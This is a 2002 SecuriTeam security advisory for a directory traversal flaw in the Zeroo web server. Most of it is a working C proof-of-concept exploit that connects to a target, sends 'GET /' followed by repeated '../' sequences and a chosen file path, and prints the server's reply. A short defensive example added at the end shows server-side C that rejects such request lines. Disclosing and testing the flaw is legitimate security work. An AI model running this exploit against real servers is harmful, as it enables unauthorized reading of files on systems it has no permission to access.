[EXPL] Zeroo Webserver Remote Directory Traversal Exploit
From: support@securiteam.com
Date: 12/04/02
From: support@securiteam.com To: list@securiteam.com Date: 4 Dec 2002 11:40:47 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Zeroo Webserver Remote Directory Traversal Exploit
------------------------------------------------------------------------
SUMMARY
As we reported in our previous article, Zeroo Folder Traversal
Vulnerability, a directory traversal issue is present in Zeroo's web
server. The following exploit code can be used to test for the mentioned
vulnerability.
DETAILS
Exploit:
/*
 * zeroo httpd remote directory traversal exploit
 * proof of concept
 * hehe, just a copy and paste from my other directory
 * traversal exploit ;p
 * [mikecc] [http://uc.zemos.net/]
 */
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <arpa/inet.h>
#include <sys/socket.h>
#include <sys/select.h>
#include <sys/types.h>
#include <netdb.h>
#include <unistd.h>

#define FOO "../"

void get(int sd);

int main(int argc, char **argv)
{
    struct sockaddr_in sock;
    struct hostent *pHe;
    int sd;
    int amt;
    char * host;
    char * file;
    short port;
    char expstr[1024];
    int x;
    char * baz;

    printf("UC-zeroo\n");
    printf("zeroo httpd remote exploit\n");
    printf("[mikecc/unixclan] [http://uc.zemos.net/]\n\n");
    if (argc != 5)
    {
        printf("%s host port file traverse_amount (>= 1 [keep incrementing till hit])\n",argv[0]);
        return 0;
    }
    host = argv[1];
    port = atoi(argv[2]);
    file = argv[3];
    amt = atoi(argv[4]);
    if ((pHe = gethostbyname(host)) == NULL)
    {
        printf("Host lookup error.\n");
        return 0;
    }
    if ((sd = socket(AF_INET,SOCK_STREAM,0)) == -1)
    {
        printf("sock() failed.\n");
        return 0;
    }
    memset(&sock,0,sizeof(sock));
    sock.sin_family = AF_INET;
    sock.sin_port = htons(port);
    memcpy(&sock.sin_addr.s_addr,pHe->h_addr,pHe->h_length);
    printf("Connecting...\n");
    if ((connect(sd,(struct sockaddr *)&sock,sizeof(sock))) == -1)
    {
        printf("Failed to connect to %s.\n",host);
        return 0;
    }
    printf("Setting up exploit string..\n");
    /* each FOO is strlen(FOO) bytes; 8 covers "GET /", "\n\n" and the NUL */
    if (amt < 0 || ((size_t)amt * strlen(FOO) + 8 + strlen(file)) > sizeof(expstr))
    {
        printf("Error. Limit 1024 characters.\n");
        return 0;
    }
    sprintf(expstr,"GET /");
    for (x = 0; x < amt; x++)
    {
        strcat(expstr,FOO);
    }
    printf("\tInserting file string..\n");
    strcat(expstr,file);
    strcat(expstr,"\n\n");
    printf("Sending exploit string...\n");
    write(sd,expstr,strlen(expstr));
    get(sd);
    close(sd);
    return 0;
}

/* print everything the server sends back until it closes the connection */
void get(int sd)
{
    char buf[1024];
    int x;
    fd_set rset;

    FD_ZERO(&rset);
    while (1)
    {
        FD_SET(sd,&rset);
        select(sd+1,&rset,0,0,0);
        if (FD_ISSET(sd,&rset))
        {
            /* leave room for the terminator; treat a read error as a close */
            if ((x = read(sd,buf,sizeof(buf) - 1)) <= 0)
            {
                printf("Connection closed by foreign host.\n");
                exit(1);
            }
            buf[x] = 0; /* clean out junk */
            printf("%s\n",buf);
        }
    }
}
ADDITIONAL INFORMATION
The information has been provided by Mike Cramp <mikecc@uc.zemos.net>.
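Added example (not part of the original advisory and not Mike Cramp's or Zeroo's code): a server-side check, in C, that rejects request lines of the shape the proof of concept sends, "GET /" followed by repeated "../" and a file name. The names request_stays_in_root and percent_decode and the 1024-byte target limit are assumptions for illustration; the check goes slightly beyond the plain "../" case by decoding %XX once and refusing backslashes.

```c
#include <ctype.h>
#include <stdlib.h>
#include <string.h>

/* Decode %XX once, in place; 0 on a malformed escape or an encoded NUL. */
static int percent_decode(char *s)
{
    char *out = s;
    while (*s) {
        if (*s != '%') { *out++ = *s++; continue; }
        if (!isxdigit((unsigned char)s[1]) || !isxdigit((unsigned char)s[2]))
            return 0;
        char hex[3] = { s[1], s[2], '\0' };
        if ((*out++ = (char)strtol(hex, NULL, 16)) == '\0')
            return 0;
        s += 3;
    }
    *out = '\0';
    return 1;
}

/* 1 = target stays inside the document root, 0 = reject the request. */
int request_stays_in_root(const char *line)
{
    char target[1024];
    size_t len;
    int depth = 0;
    const char *p = target;
    if (strncmp(line, "GET /", 5) != 0)
        return 0;                      /* only origin-form GET handled here */
    len = strcspn(line + 4, " \r\n");  /* target ends at space or line end */
    if (len >= sizeof(target))
        return 0;
    memcpy(target, line + 4, len);
    target[len] = '\0';
    /* fail closed on bad escapes and on backslash path separators */
    if (!percent_decode(target) || strchr(target, '\\'))
        return 0;
    while (*p) {
        p += strspn(p, "/");           /* skip one or more separators */
        len = strcspn(p, "/");         /* length of the next segment */
        if (len == 2 && p[0] == '.' && p[1] == '.') {
            if (--depth < 0)
                return 0;              /* climbed above the root */
        } else if (len > 0 && !(len == 1 && p[0] == '.')) {
            depth++;                   /* ordinary segment, one level down */
        }
        p += len;
    }
    return 1;
}
```

The file must then be opened using the same once-decoded string that was checked; decoding again after the check would reopen the hole.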